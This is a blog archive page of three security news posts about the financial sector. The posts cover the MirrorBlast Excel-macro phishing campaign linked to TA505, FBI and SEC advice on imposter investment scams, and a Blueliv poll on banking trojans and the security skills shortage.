Search This Blog

Showing posts with label Financial Sector. Show all posts

This New Phishing Attack Uses a Weaponized Excel File

 

A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, a phishing effort, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has now studied the malware and warns that the malicious Excel files might escape malware-detection systems due to "extremely lightweight" embedded macros, making it especially risky for businesses that rely on detection-based protection and sandboxing. 

Macros, or scripts for automating activities, have grown in popularity among cybercriminals. Despite the fact that macros are disabled by default in Excel, attackers employ social engineering to deceive potential victims into allowing macros. Despite appearing to be a simple approach, macros have been employed by state-sponsored hackers because they frequently work. 

Microsoft earlier this year extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a recent phenomenon by attackers to utilise outdated Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems. 

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

While the MirrorBlast attack begins with a document attached to an email, it afterwards uses a Google feed proxy URL with a SharePoint and OneDrive trap that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a hacked SharePoint site or a bogus OneDrive site. Both versions will take to the malicious Excel document. 

The sample MirrorBlast email demonstrates how the attackers are capitalising on company-issued data on COVID-related modifications to working conditions. Morphisec points out that due to compatibility issues with ActiveX components, the macro code can only be run on a 32-bit version of Office. The macro itself runs a JavaScript script meant to avoid sandboxing by determining if the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and instals an MSI package. 

Morphisec discovered two MIS installation versions that employed legal scripting tools named KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attacker's command and control server, including the domain, computer name, user name, and process list. It then answers with a number indicating whether the Rebol version should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has previously utilised. 

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 

The FBI and SEC Provided Guidance Against Imposter Scams

 

The FBI and SEC have come with new guidance for investors to fight against financial scams. Users are being suggested to reject and report fraud if they want to protect their business from scams and save their money from being paid to an imposter. 

Among various sectors, consumer markets have taken a major hit as stringent lockdowns have brought economic activity to a standstill. 

Nowadays, cyber-attackers are employing highly sophisticated tricks to carry out financial scams activity. According to the FBI's Criminal Investigative Division, and the United States Securities and Exchange Commission, fraudsters always try to mock as they are a real broker or investment adviser and trick users. Once a belief has been suspended, the fraudsters can trick investors into surrendering more information. 

The FBI and the SEC said, that cybercriminals are using very advanced technology for becoming real investors including fake social media profiles, fake websites that look exact to those of legitimate firms and are hiding their actual locations. 

In addition, cybercriminals have been falsifying legitimate documents, like public reports with a real identity and Central Registration Depository (CRD) numbers but unorganized firm names. Fraudsters who are tricking investors reportedly used poor grammar and had spelling errors. Besides the FBI and the SEC, a similar warning had been issued by FINRA last week. 

"The doctored BrokerCheck report was emailed to potential “clients” using the name and CRD number of a registered investment professional—but with a company that is not registered as a broker-dealer with FINRA..." 

"...The solicitation included other documentation and a request for investors to respond with a photo of their driver’s license and other personal information...", the group wrote. 

Safety Measures

•According to the FBI and SEC recommendation if someone is claiming that investment is legitimate then users should research their name on Investor.gov, and verify thoroughly. 

• Be aware of fake offers like high investment returns 

•Before going ahead with any firm, investors are advised to use FINRA's BrokerCheck to verify. 

•The FBI and SEC also highlighted that most licensed and registered investment organizations don't allow investors to use credit cards or cryptocurrencies to invest, so you are advised to think twice before making investments. 

•At the of payment, investors are advised not to send money directly without verifying the recipient. Also, one must not send personal data including date of birth, driver's license number, or any other official documents.

Banking Trojen rises as the Top Security Concern


According to a new research by Blueliv, banking trojans have risen as the biggest threat to the Financial sector second only to mobile malware. A twitter poll conducted by cyberthreat intelligence provider Blueliv, from 11,000 users revealed that a third of respondents were concerned about the impact banking Trojans (31 percent) and mobile malware (28 percent) will have on financial services organizations and their customers in 2020. Tracking these financial threats, Blueliv researchers observed an increase in Trickbot banking trojan (283%) and a 130% increase in Dridex botnets. These Q2 and Q3 botnets are believed to be distributing banking trojans and malware in the financial sector and their customers.


Skill shortage and lack of visibility of threats present as security challenge- According to the poll, the financial sector is suffering from a major skill shortage in building security programs and identifying security threats - the most pressing being a shortage of skills (28 percent), followed by the high volume of threats and alerts (26 percent) and a lack of visibility into cyber threats (20 percent) (by Blueliv). Realwire quotes, "This is hardly surprising: as financial services institutions (FSIs) embrace digital processes and new customer interaction channels, so their attack surface grows, making it harder to keep on top of threats ranging from Point-of-Sale (PoS) to ATM malware, mobile apps malware to card skimmers."

A recent data by (ISC)2 shows that the global skills shortage has crossed 4 million. In Europe alone, the shortage has bypassed 100 percent. Daniel Solís, CEO and founder, Blueliv says, “Organizations in the financial sector face a constantly changing threat landscape. Business priorities have shifted and digital risk management is now central. Because they are such high-value targets for cybercriminal activity, it is imperative that financial services organizations monitor what is happening both inside and outside their networks in real-time to create effective mitigation strategies before, during and after an attack.”

He further commented, “FSI (financial services institutions) security teams can be easily overwhelmed by the number of threat alerts they receive which can very quickly result in alert fatigue and desensitization to real, preventable threats. Threat intelligence can address the cyber skills gap through continuous automated monitoring combined with the human resource to provide context, helping FSIs develop highly-targeted threat detection, prevention, and investigation capabilities.”

Financial organizations are prime suspects for attacks, even after having the most sophisticated cyber defense strategies, weak spots do remain and are being exploited by trojans and malware overlooked by fraud risk assessment teams due to skills shortage and poor threat visibility.